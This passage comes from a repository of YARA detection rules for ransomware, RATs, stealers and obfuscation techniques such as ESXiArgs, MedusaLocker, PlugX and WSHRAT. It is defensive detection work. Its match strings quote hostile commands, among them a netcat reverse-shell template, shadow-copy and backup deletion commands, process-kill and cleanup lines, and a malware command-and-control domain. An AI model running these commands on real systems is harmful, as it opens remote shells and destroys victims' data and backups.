 4 |         author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 |         description = "Detects PlugX-style Malware delivery via removable Drives (USB) - LNK File"
 6 |         reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
 7 |         date = "2023-06-21"
 8 |         tlp = "CLEAR"
 9 | 
10 |     strings:
11 | 
12 |         /*
13 |         These rules are based on the Proof-of-Concept which was presented at 
14 |         REcon 2023 in Montreal, Canada by Michael Harbison (Palo Alto Networks Unit42)
15 |         */
16 | 
17 |         $lnk_magic = {4C 00 00 00 01 14 02 00}
18 | 
19 |         $driveletter_4X = {4? 00 3A 00 5C 00 A0 00 5C}
20 |         $driveletter_5X = {5? 00 3A 00 5C 00 A0 00 5C}
21 | 
22 |         $s_cmd = "C:\\Windows\\System32\\cmd.exe" ascii
23 |         $s_recBin = "\\RECYCLER.BIN\\" wide
24 |         $s_shell32 = "%SystemRoot%\\system32\\SHELL32.dll" wide
25 |         $s_comspec = "%ComSpec%" ascii
26 | 
27 |     condition:
28 |         $lnk_magic at 0x0
29 |         and any of ($s_*)
30 |         and ($driveletter_4X or $driveletter_5X)
31 | }
32 | 
33 | rule MALWARE_PlugX_USB_Delivery_ini_Icon_Jun23
34 | {
35 |     meta:
36 |         author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
37 |         description = "Detects PlugX-style Malware delivery via removable Drives (USB) - Desktop.ini Icon File; could potentially yield FPs"
38 |         reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
39 |         date = "2023-06-21"
40 |         tlp = "CLEAR"
41 | 
42 |     strings:
43 |         $s_shellclassinfo = "[.ShellClassInfo]" ascii
44 |         // Drive Icon
45 |         $s_IconRes = "IconResource=C:\\Windows\\system32\\SHELL32.dll,7" ascii
46 | 
47 |     condition:
48 |         all of ($s_*)
49 | }
50 | 
51 | rule MALWARE_PlugX_USB_Delivery_ini_RecBin_Jun23
52 | {
53 |     meta:
54 |         author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
55 |         description = "Detects PlugX-style Malware delivery via removable Drives (USB) - Desktop.ini Recycle Bin; could potentially yield FPs"
56 |         reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
57 |         date = "2023-06-21"
58 |         tlp = "CLEAR"
59 | 
60 |     strings:
61 |         $s_shellclassinfo = "[.ShellClassInfo]" ascii
62 |         // Recycle Bin CLSID
63 |         $s_IconRes = "CLSID = {645FF040-5081-101B-9F08-00AA002F954E}" ascii
64 | 
65 |         $neg_LRN = "shell32.dll,-8964" ascii
66 | 
67 |     condition:
68 |         all of ($s_*)
69 |         and not $neg_LRN
70 | }
71 | 


--------------------------------------------------------------------------------
/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Bash_Feb23.yar:
--------------------------------------------------------------------------------
 1 | rule RANSOM_ESXiArgs_Ransomware_Bash_Feb23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 | 		description = "Detects the ESXiArgs Ransomware encryption bash script"
 6 | 		reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware"
 7 | 		date = "2023-02-07"
 8 | 		tlp = "CLEAR"
 9 | 
10 | 	strings:
11 |         	$bash = "#!/bin/sh"
12 | 		
13 |         	$wait = "Waiting for task' completion..."
14 | 
15 |         	$comment0 = "## SSH HI"
16 |         	$comment1 = "## CHANGE CONFIG"
17 |         	$comment2 = "## STOP VMX"
18 |         
19 |         	$kill0 = "echo \"KILL VMX\""
20 |         	$kill1 = "kill -9 $(ps | grep vmx | awk '{print $2}')"
21 | 
22 | 		$index = "$path_to_ui/index1.html"
23 | 
24 |         	$ext0 = ".vmdk" 
25 |         	$ext1 = ".vmx"
26 |         	$ext2 = ".vmxf"
27 |         	$ext3 = ".vmsd"
28 |         	$ext4 = ".vmsn"
29 |         	$ext5 = ".vswp"
30 |         	$ext6 = ".vmss"
31 |         	$ext7 = ".nvram"
32 |         	$ext8 = ".vmem"
33 | 
34 |         	$clean0 ="/bin/rm -f $CLEAN_DIR\"encrypt\" $CLEAN_DIR\"nohup.out\" $CLEAN_DIR\"index.html\" $CLEAN_DIR\"motd\" $CLEAN_DIR\"public.pem\" $CLEAN_DIR\"archieve.zip\""
35 |         	$clean1 = "/bin/echo '' > /etc/rc.local.d/local.sh"
36 | 
37 | 	condition:
38 | 		$bash
39 | 		and $wait
40 |         	and any of ($comment*)
41 |         	and 2 of ($kill*)
42 |         	and $index
43 |         	and 4 of ($ext*)
44 |         	and 2 of ($clean*)
45 | }
46 | 


--------------------------------------------------------------------------------
/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Encrypt_Feb23.yar:
--------------------------------------------------------------------------------
 1 | rule RANSOM_ESXiArgs_Ransomware_Encryptor_Feb23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 | 		description = "Detects the ESXiArgs Ransomware 'encrypt' binary"
 6 | 		reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware"
 7 | 		date = "2023-02-07"
 8 | 		tlp = "CLEAR"
 9 | 
10 | 	strings:
11 | 		// Sosemanuk Pseudo-Random Number Generator
12 |         	$sosemanuk_prng = {48 8b 45 f8 48 01 45 e0 48 8b 45 f8 48 29 45 d8 48 8b 45 e8 8b 90 80 00 00 00 48 8b 45 f8 01 c2 48 8b 45 e8 89 90 80 00 00 00}
13 |         
14 |         	// Sosemanuk Multiplication Tables
15 |         	// based on Findcrypt3 rule https://github.com/polymorf/findcrypt-yara/blob/ad165a6b2bd5b56932657b96edffa851b5b00b15/findcrypt3.rules#L1522
16 |         	$sosemanuk_mul_a = {00 00 00 00 13 CF 9F E1 26 37 97 6B 35 F8 08 8A [992] DE 4D 5B B5 CD 82 C4 54 F8 7A CC DE EB B5 53 3F}
17 |         	$sosemanuk_mul_ia = {00 00 00 00 CD 40 0F 18 33 80 1E 30 FE C0 11 28 [992] 1C 65 E2 9E D1 25 ED 86 2F E5 FC AE E2 A5 F3 B6}
18 | 
19 |         	$interpreter = "/lib64/ld-linux-x86-64.so.2"
20 | 
21 |         	$debug0 = "encrypt_bytes: too big data"
22 |         	$debug1 = "Progress: %f"
23 | 
24 |         	$help = "usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]"
25 | 
26 | 	condition:
27 | 		uint32be(0x0) == 0x7F454C46
28 | 		and all of ($sosemanuk_*)
29 |         	and $interpreter
30 |         	and 2 of ($debug*)
31 |         	and $help
32 | }
33 | 


--------------------------------------------------------------------------------
/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Python_Feb23.yar:
--------------------------------------------------------------------------------
 1 | rule RANSOM_ESXiArgs_Ransomware_Python_Feb23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 | 		description = "Detects the ESXiArgs Ransomware encryption bash script"
 6 | 		reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware"
 7 | 		date = "2023-02-07"
 8 | 		tlp = "CLEAR"
 9 | 
10 | 	strings:
11 |         	$python = "#!/bin/python"
12 |         	$desc = "This module starts debug tools"
13 | 
14 |         	$command0 = "server_namespace"
15 |         	$command1 = "service_instance"
16 |         	$command2 = "local"
17 |         	$command3 = "operation_id"
18 |         	$command4 = "envelope"
19 | 
20 |         	$cmd = "'mkfifo /tmp/tmpy_8th_nb; cat /tmp/tmpy_8th_nb | /bin/sh -i 2>&1 | nc %s %s > /tmp/tmpy_8th_nb' % (host, port)"
21 |         	$OpenSLPPort = "port = '427'"
22 |         	$listener = "HTTPServer(('127.0.0.1', 8008), PostServer).serve_forever()"
23 | 
24 | 	condition:
25 | 		$python
26 |         	and $desc
27 |         	and 4 of ($command*)
28 |         	and $cmd
29 |         	and $OpenSLPPort
30 |         	and $listener
31 | }
32 | 


--------------------------------------------------------------------------------
/Yara/Malware/RANSOM_Lockbit_Black_Packer.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | import "math"
 3 | import "console"
 4 | 
 5 | rule RANSOM_Lockbit_Black_Packer : Ransomware {
 6 | 
 7 |    meta:
 8 |       author = "SECUINFRA Falcon Team"
 9 |       description = "Detects the packer used by Lockbit Black (Version 3)"
10 |       reference = "https://twitter.com/vxunderground/status/1543661557883740161"
11 |       date = "2022-07-04"
12 |       tlp = "WHITE"
13 |       hash0 = "80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce"
14 |       hash1 = "506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51"
15 |       hash2 = "d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee"
16 | 
17 |    strings:
18 |       $sectionname0 = ".rdata$zzzdbg" ascii
19 |       $sectionname1 = ".xyz" ascii fullword
20 |       
21 |       // hash checks
22 |       $check0 = {3d 75 80 91 76 ?? ?? 3d 1b a4 04 00 ?? ?? 3d 9b b4 84 0b}
23 |       $check1 = {3d 75 ba 0e 64}
24 |       
25 |       // hex/ascii calculations
26 |       $asciiCalc = {66 83 f8 41 ?? ?? 66 83 f8 46 ?? ?? 66 83 e8 37}
27 |       
28 |    condition:
29 |       uint16(0) == 0x5a4d
30 |       and filesize > 111KB // Size on Disk/1.5
31 |       and filesize < 270KB // Size of Image*1.5
32 |       and all of ($sectionname*)
33 |       and any of ($check*)
34 |       and $asciiCalc
35 |       and for any i in (0..pe.number_of_sections - 1): 
36 |       (math.entropy(pe.sections[i].raw_data_offset, pe.sections[i].raw_data_size) > 7.9
37 |       and (pe.sections[i].name == ".text" or pe.sections[i].name == ".data" or pe.sections[i].name == ".pdata")//)
38 |       // console requires Yara 4.2.0. For older versions uncomment closing bracket above und comment out the line below
39 |       and console.log("High Entropy section found:", pe.sections[i].name))
40 | }
41 | 


--------------------------------------------------------------------------------
/Yara/Malware/RANSOM_Magniber_ISO_Jan23.yar:
--------------------------------------------------------------------------------
 1 | rule RANSOM_Magniber_ISO_Jan23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		description = "Detects Magniber Ransomware ISO files from fake Windows Update delivery method"
 6 | 		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
 7 | 		date = "2023-01-13"
 8 | 		tlp = "CLEAR"
 9 | 		hash = "4dcbcc070e7e3d0696c777b63e185406e3042de835b734fe7bb33cc12e539bf6"
10 | 
11 | 	strings:
12 | 		
13 | 		$magic = {43 44 30 30 31} // CD001 ISO Magic
14 | 		$tool = {55 4C 54 52 41 49 53 4F 00 39 2E 37 2E 36 2E 33 38 32 39} // "ULTRAISO.9.7.6.3829"
15 | 		
16 |         	$msiMagic = {D0 CF 11 E0 A1 B1 1A E1}
17 |         	$dosString = "!This program cannot be run in DOS mode" ascii // To "exclude" Office files which also use $msiMagic
18 |         	$lnkMagic = {4C 00 00 00}
19 | 	
20 | 	condition:
21 | 		filesize > 200KB 
22 | 		and filesize < 800KB 
23 | 		and all of them
24 | }
25 | 


--------------------------------------------------------------------------------
/Yara/Malware/RANSOM_Magniber_LNK_Jan23.yar:
--------------------------------------------------------------------------------
 1 | rule RANSOM_Magniber_LNK_Jan23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		description = "Detects Magniber Ransomware LNK files from fake Windows Update delivery method"
 6 | 		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
 7 | 		date = "2023-01-13"
 8 | 		tlp = "CLEAR"
 9 | 		hash = "16ecec4efa2174dec11f6a295779f905c8f593ab5cc96ae0f5249dc50469841c"
10 | 
11 | 	strings:
12 | 		$netbiosName = "victim1" ascii fullword
13 | 		$macAddress = {00 0C 29 07 E1 6D}
14 | 	
15 | 	condition:
16 | 		uint32be(0x0) == 0x4C000000 
17 | 		and all of them
18 | }
19 | 


--------------------------------------------------------------------------------
/Yara/Malware/RANSOM_MedusaLocker_July22.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | 
 3 | rule RANSOM_MedusaLocker_July22 : Ransomware {
 4 | 
 5 |    meta:
 6 |       author = "SECUINFRA Falcon Team"
 7 |       description = "Detects MedusaLocker Ransomware"
 8 |       reference = "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf"
 9 |       date = "2022-07-08"
10 |       tlp = "WHITE"
11 |       hash0 = "80ca82e3e62514c66250ff91cc28a945758d435665cd36a347bf9fea9278aa48"
12 |       hash1 = "09ac3b065defa5e69db8573ec2d201e3199ad7508ed775174fe76c18f8b9710b"
13 |       hash2 = "bee9de4694ab25b125b95579235d9f8a5ec48658dfd5b7feb78915ee2aacc6ca"
14 |       hash3 = "1ff4ab45cc7b71d22d2433214eed2b7b2344bb1921c97a44c44fe5f3a78f8135"
15 |       hash4 = "af768da08a34ddf503522186a22e65e623491e48754356210cc6798598f85266"
16 | 
17 |    strings:
18 |       $log0 =  "[LOCKER] Init cryptor is failed" wide
19 |       $log1 =  "[LOCKER] Kill processes" wide
20 |       $log2 =  "[LOCKER] Scan" wide
21 |       $log3 =  "[LOCKER] Already Scan" wide 
22 |       $log4 =  "[LOCKER] Is running" wide
23 |       $log5 =  "[LOCKER] Is already running" wide
24 |       $log6 =  "[LOCKER] Priv: ADMIN" wide
25 |       $log7 =  "[LOCKER] Priv: USER" wide
26 |       $log8 =  "[LOCKER] Init cryptor" wide
27 |       $log9 =  "[LOCKER] Put ID to HTML-code" wide
28 |       $log10 = "[LOCKER] Init cryptor is failed" wide
29 |       $log11 = "[LOCKER] Add to autorun" wide
30 |       $log12 = "[LOCKER] Put ID to HTML-code is failed!" wide
31 |       $log13 = "[LOCKER] Scan hidden devices" wide
32 |       $log14 = "[LOCKER] Stop and delete services" wide
33 |       $log15 = "[LOCKER] Kill processes" wide
34 |       $log16 = "[LOCKER] Remove backups" wide
35 |       $log17 = "[LOCKER] Lock drive " wide
36 |       $log18 = "[LOCKER] Run scanning..." wide
37 |       $log19 = "[LOCKER] Sleep at 60 seconds..." wide
38 | 
39 |       $mutex = "{8761ABBD-7F85-42EE-B272-A76179687C63}" wide
40 |       $uacbypass0 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" wide
41 |       $uacbypass1 = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}" wide
42 | 
43 |       $note0 = "HOW_TO_RECOVER_DATA.html" ascii
44 |       $note1 = "We gathered highly confidential/personal data. These data are currently stored on" ascii
45 |       $note2 = "<b>/!\\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\\" ascii
46 |       $note3 = "<!-- !!! dont changing this !!! -->" fullword ascii
47 | 
48 |       $ext = ".dll,.sys,.ini,.rdp,.encrypted,.exe" ascii
49 |       $services = "Intuit.QuickBooks.FCS,QBCFMonitorService,sqlwriter,msmdsrv,tomcat6,zhudongfangyu" ascii
50 | 
51 |       $system0 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" wide
52 |       $system1 = "vssadmin.exe Delete Shadows /All /Quiet" wide
53 |       $system2 = "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures" wide
54 |       $system4 = "bcdedit.exe /set {default} recoveryenabled No" wide
55 |       $system5 = "wmic.exe SHADOWCOPY /nointeractive" wide
56 |       
57 |    condition:
58 |       uint16(0) == 0x5a4d
59 |       and pe.imphash() == "1a395bd10b20c116b11c2db5ee44c225"
60 |       and filesize > 450KB // Size on Disk/1.5
61 |       and filesize < 1MB // Size of Image*1.5
62 |       and all of ($log*)
63 |       and $mutex
64 |       and any of ($uacbypass*)
65 |       and 2 of ($note*)
66 |       and $ext and $services
67 |       and 2 of ($system*)
68 | }


--------------------------------------------------------------------------------
/Yara/Malware/formbook.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule MALWARE_Formbook_Filename_Stage_2 {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		date = "19.02.2022"
 6 | 		reference = "https://bazaar.abuse.ch/sample/295a708fd87173762a4971443304e23990462f94e8db48d83472f19425daaa87"
 7 | 		version = "0.1"
 8 | 
 9 | 	strings:
10 | 		$name = "PDF-Scan180220225499044" ascii wide
11 | 
12 | 	condition:
13 | 		uint16(0) == 0x5a4d and filesize < 300KB and $name
14 | }


--------------------------------------------------------------------------------
/Yara/Misc/suspicious_sites.yar:
--------------------------------------------------------------------------------
 1 | rule SUSP_Websites {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		description = "Detects the reference of suspicious sites that might be used to download further malware"
 5 | 		version = "0.2"
 6 | 		date = "27.02.2022"
 7 | 
 8 | 
 9 | 	strings:
10 | 		$site_1 = "https://paste.ee" nocase 
11 | 		$site_2 = "https://pastebin.com" nocase 
12 | 		$site_3 = "https://drive.google.com" nocase 
13 | 		$site_4 = "cdn.discordapp.com/attachments" nocase 
14 | 		$site_5 = "https://transfer.sh" nocase 
15 | 		$site_6 = "ngrok.io" nocase
16 | 
17 | 	condition:
18 | 		any of ($site_*)
19 | }


--------------------------------------------------------------------------------
/Yara/Obfuscation/javascript_obfuscation.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule OBFUS_JavaScript_WScript_Hex_Strings_Usage {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		date = "12.02.2022"
 6 | 		description = "Detects the frequent usage of Wscript to get an hex encoded string from an array and interpret it. Used by e.g WSHRAT"
 7 | 
 8 | 	strings:
 9 | 		$wscript = "= WScript["
10 | 
11 | 		// first 4 bytes of common strings
12 | 		$hex_enc_str1 = "\\x63\\x72\\x65\\x61" // createObject
13 | 		$hex_enc_str2 = "\\x73\\x63\\x72\\x69" // scriptName
14 | 		$hex_enc_str3 = "\\x71\\x75\\x69\\x74" //quit
15 | 		$hex_enc_str4 = "\\x41\\x72\\x67\\x75" // Arguments
16 | 
17 | 	condition:
18 | 		#wscript > 30 and 2 of ($hex_enc_str*)
19 | }


--------------------------------------------------------------------------------
/Yara/Obfuscation/powershell_obfuscation.yar:
--------------------------------------------------------------------------------
 1 | rule OBFUS_PowerShell_Execution {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		date = "09.02.2022"
 5 | 		description = "Detects some variations of obfuscated PowerShell code to execute further PowerShell code"
 6 | 
 7 | 	strings:
 8 | 		$a1 = "-nop -w hiddEn -Ep bypass -Enc" ascii nocase
 9 | 		$a2 = "-noP -sta -w 1 -enc" ascii nocase
10 | 		
11 | 		$b1 = "SQBFAF"
12 | 
13 | 	condition:
14 | 		filesize < 300KB 
15 | 		and $b1
16 | 		and 1 of ($a*) 
17 | }
18 | 
19 | rule OBFUS_PowerShell_Replace_Tilde {
20 | 	meta:
21 | 		author = "SECUINFRA Falcon Team"
22 | 		date = "10.02.2022"
23 | 		description = "Detects usage of Replace to replace tilde. Often observed in obfuscation"
24 | 		reference = "https://bazaar.abuse.ch/sample/4c391b57d604c695925938bfc10ceb4673edd64e9655759c2aead9e12b3e17cf/"
25 | 
26 | 	strings:
27 | 		$a = ".Replace(\"~\",\"0\")"
28 | 
29 | 	condition:
30 | 		filesize < 400KB
31 | 		and $a
32 | }
33 | 
34 | rule OBFUS_PowerShell_Common_Replace {
35 | 	meta:
36 | 		author = "SECUINFRA Falcon Team"
37 | 		date = "12.02.2022"
38 | 		description = "Detects the common usage of replace for obfuscation"
39 | 
40 | 	strings:
41 | 		$replace = "replace(" nocase
42 | 
43 | 	condition:
44 | 		filesize < 100KB 
45 | 		and #replace > 10
46 | }
47 | 


--------------------------------------------------------------------------------
/Yara/Obfuscation/vbs_obfuscation.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule OBFUS_VBS_Reverse_StartUp {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		date = "27.02.2022"
 6 | 		description = "Detecs reversed StartUp Path. Sometimes used as obfuscation"
 7 | 
 8 | 	strings:
 9 | 		$reverse = "\\putratS\\smargorP\\uneM" wide nocase // Menu\Programs\Startup
10 | 
11 | 	condition:
12 | 		filesize < 200KB and $reverse
13 | }
14 | 
15 | 


--------------------------------------------------------------------------------
/Yara/PowerShell_Misc/download_variations.yar:
--------------------------------------------------------------------------------
 1 | rule SUSP_PowerShell_Download_Temp_Rundll : PowerShell Download {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		description = "Detect a Download to %temp% and execution with rundll32.exe"
 5 | 		date = "09.02.2022"
 6 | 
 7 | 	strings:
 8 | 		$location = "$Env:temp" nocase
 9 | 		$download = "downloadfile(" nocase
10 | 		$rundll = "rundll32.exe"
11 | 
12 | 	condition:
13 | 		$location and $download and $rundll
14 | }
15 | 
16 | 


--------------------------------------------------------------------------------
/Yara/RAT/asyncrat.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | 
 3 | rule MAL_AsyncRAT_Config_Decryption : rat malware asyncrat {
 4 | 	meta:
 5 | 		author = "SECUINFRA Falcon Team"
 6 | 		date = "27.02.2022"
 7 | 		description = "Detects AsnycRAT based on it's config decryption routine"
 8 | 
 9 | 	strings:
10 | 		$config_decryption = { 7E [4] 6F [4] 80 [4] 7E [4] 7E [4] 6F [4] 80 [4] 7E [4] 7E [4] 6F [4] 80 [4] 7E }
11 | 
12 | 	condition:
13 | 		uint16(0) == 0x5a4d
14 | 		and filesize < 200KB
15 | 		and pe.imports("mscoree.dll")
16 | 		and $config_decryption
17 | }


--------------------------------------------------------------------------------
/Yara/RAT/n-w0rm.yar:
--------------------------------------------------------------------------------
 1 | rule MAL_NW0rm { 
 2 | 	meta:
 3 | 		description = "Detect the final RAT dropped by N-W0rm"
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		reference_1 = "https://bazaar.abuse.ch/sample/1b976a1fa26c4118d09cd6b1eaeceafccc783008c22da58d6f5b1b3019fa1ba4/"
 6 | 		reference_2 = "https://www.virustotal.com/gui/file/afc5a5a1a18f3e65bffa6e3d4e68ed90c102a942156db77ef570c4e8d1394dbc"
 7 | 		reference_3 = "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/"
 8 | 		hash = "08587e04a2196aa97a0f939812229d2d"
 9 | 		date = "03.02.2022"
10 |           
11 | 	strings:
12 | 		$a1 = "N-W0rm" fullword wide
13 | 		$a2 = "N_W0rm" fullword wide
14 | 		$a3 = "|NW|" fullword wide
15 | 		
16 | 		$b1 = "Select * from AntivirusProduct" fullword wide
17 | 		$b2 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File" fullword wide
18 | 		$b3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
19 | 		$b4 = "killer" fullword wide
20 | 		$b5 = "nyanmoney02.duckdns.org" fullword wide
21 | 
22 | 	condition:
23 | 		uint16(0) == 0x5a4d and 2 of ($a*) and 2 of ($b*)
24 | }
25 | 


--------------------------------------------------------------------------------
/Yara/RAT/njrat.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | 
 3 | rule MAL_njrat {
 4 | 	meta:
 5 | 		author = "SECUINFRA Falcon Team"
 6 | 		date = "27.02.2022"
 7 | 
 8 | 		hash_1 = "38928ae157586ec7785121f79ac5f9eb6727eae66aa512d8adf52d9485928126"
 9 | 		hash_2 = "fcfa50ca0d4dcf2bb6e96e7b7a223138068f2d6a458d2630757e3bcbe0684aaa"
10 | 		hash_3 = "fa28ad86ab796c8e18096badc31bcb1719474d268945172d983bb30ded219944"
11 | 
12 | 	strings:
13 | 		$mutex_1 = "02ddd2742fd5023579c925948979506c" wide
14 | 		$mutex_2 = "f2defcfce1660e18fd445b5dbce27282" wide
15 | 		$mutex_3 = "f7d3b79624476341312866012d0bbf19" wide
16 | 
17 | 		$a1 = "\"|'|'|\"" wide
18 | 		$a2 = "SEE_MASK_NOZONECHECKS" wide
19 | 		
20 | 		$b1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
21 | 		$b2 = "netsh firewall" wide
22 | 		$b3 = "[ENTER]\\r\\n" wide
23 | 		$b4 = "Execute ERROR" wide
24 | 
25 | 	condition:
26 | 		uint16(0) == 0x5a4d
27 | 		and filesize < 100KB
28 | 		and pe.imports("mscoree.dll")
29 | 		and pe.imports("avicap32.dll")
30 | 		and 1 of ($mutex_*)
31 | 		or (
32 | 			1 of ($a*)
33 | 			and 2 of ($b*)
34 | 		)
35 | }


--------------------------------------------------------------------------------
/Yara/RAT/wshrat.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule MAL_WSHRAT : RAT JavaScript WSHRAT {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		date = "12.02.2022"
 6 | 		description = "Detects the final Payload of WSHART"
 7 | 		hash = "b7f53ccc492400290016e802e946e526"
 8 | 
 9 | 
10 | 	strings:
11 | 		$function1 = "runBinder"
12 | 		$function2 = "getBinder"
13 | 		$function3 = "Base64Encode"
14 | 		$function4 = "payloadLuncher"
15 | 		$function5 = "getMailRec"
16 | 		$function6 = "getHbrowser"
17 | 		$function7 = "passgrabber"
18 | 		$function8 = "getRDP"
19 | 		$function9 = "getUVNC"
20 | 		$function10 = "getConfig"
21 | 		$function11 = "getKeyLogger"
22 | 		$function12 = "enumprocess"
23 | 		$function13 = "cmdshell"
24 | 		$function14 = "faceMask"
25 | 		$function15 = "upload"
26 | 		$function16 = "download"
27 | 		$function17 = "sitedownloader"
28 | 		$function18 = "servicestarter"
29 | 		$function19 = "payloadLuncher"
30 | 		$function20 = "keyloggerstarter"
31 | 		$function21 = "reverserdp"
32 | 		$function22 = "reverseproxy" 
33 | 		$function23 = "decode_pass"
34 | 		$function24 = "disableSecurity"
35 | 		$function25 = "installsdk"
36 | 
37 | 		$cmd1 = "osversion = eval(osversion)"
38 | 		$cmd2 = "download(cmd[1],cmd[2])"
39 | 		$cmd3 = "keyloggerstarter(cmd[1]"
40 | 		$cmd4 = "decode_pass(retcmd);"
41 | 
42 | 	condition:
43 | 		 filesize < 2MB and 2 of ($cmd*) and 12 of ($function*) 
44 | }


--------------------------------------------------------------------------------
/Yara/Stealer/redline_stealer.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | 
 3 | rule MAL_Redline_Certificate_Bosch {
 4 | 	meta:
 5 | 		author = "SECUINFRA Falcon Team"
 6 | 		date = "12.02.2022"
 7 | 		description = "Detects Certificate used by Redline Stealer"
 8 | 		reference = "https://bazaar.abuse.ch/sample/60e40ccfc16ca9f36dee7ec2b4e2fc81398ff408bf7cc63fb7ddf0fef1d4b72b"
 9 | 
10 | 	condition:
11 | 		uint16(0) == 0x5a4d and
12 | 		for any i in (0..pe.number_of_signatures) : (
13 | 			pe.signatures[i].issuer contains "BOSCH BOSCH SDS-plus Professional 607557501" and
14 | 			pe.signatures[i].serial == "72:76:34:57:ef:50:d5:b0:4e:00:b3:74:ab:c6:ff:11"
15 | 		)
16 | }
17 | 
18 | rule MAL_Redline_Certificate_GeForce {
19 | 	meta:
20 | 		author = "SECUINFRA Falcon Team"
21 | 		date = "13.02.2022"
22 | 		description = "Detects Certificate used by Redline Stealer"
23 | 		reference = "https://bazaar.abuse.ch/sample/f36c1c2f6b6f334be93b72fccb8e46cadd59304dc244b3a5aabecc8f4018eb77"
24 | 
25 | 	condition:
26 | 		uint16(0) == 0x5a4d and
27 | 		for any i in (0..pe.number_of_signatures) : (
28 | 			pe.signatures[i].issuer contains "Palit GeForce RTX 3070 Dual H21 LHR" and
29 | 			pe.signatures[i].serial == "11:cd:b5:d5:9d:fb:90:84:45:f3:a7:22:25:47:a4:54"
30 | 		)
31 | }


--------------------------------------------------------------------------------
/Yara/Windows/windows_misc.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule SUSP_Scheduled_Tasks_Create_From_Susp_Dir {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		date = "21.02.2022"
 6 | 		description = "Detects a PowerShell Script that creates a Scheduled Task that runs from an suspicious directory"
 7 | 		version = "0.1"
 8 | 
 9 | 	strings:
10 | 		$create = "New-ScheduledTaskAction"
11 | 		$execute = "-Execute"
12 | 
13 | 		$trigger = "New-ScheduledTaskTrigger"
14 | 		$at_param = "-At"
15 | 
16 | 		$register = "Register-ScheduledTask"
17 | 		$action = "-Action"
18 | 
19 | 		$path1 = "C:\\ProgramData\\"
20 | 		$path2 = "C:\\Windows\\Temp"
21 | 		$path3 = "AppData\\Local"
22 | 
23 | 	condition:
24 | 		filesize < 30KB and 1 of ($path*) and ($create and $execute) or ($trigger and $at_param) or ($register and $action)
25 | }
26 | 
27 | rule SUSP_Reverse_Run_Key {
28 | 	meta:
29 | 		author = "SECUINFRA Falcon Team"
30 | 		date = "27.02.2022"
31 | 		description = "Detects a Reversed Run Key"
32 | 
33 | 	strings:
34 | 		$run = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
35 | 
36 | 	condition:
37 | 		 filesize < 100KB and $run
38 | }


--------------------------------------------------------------------------------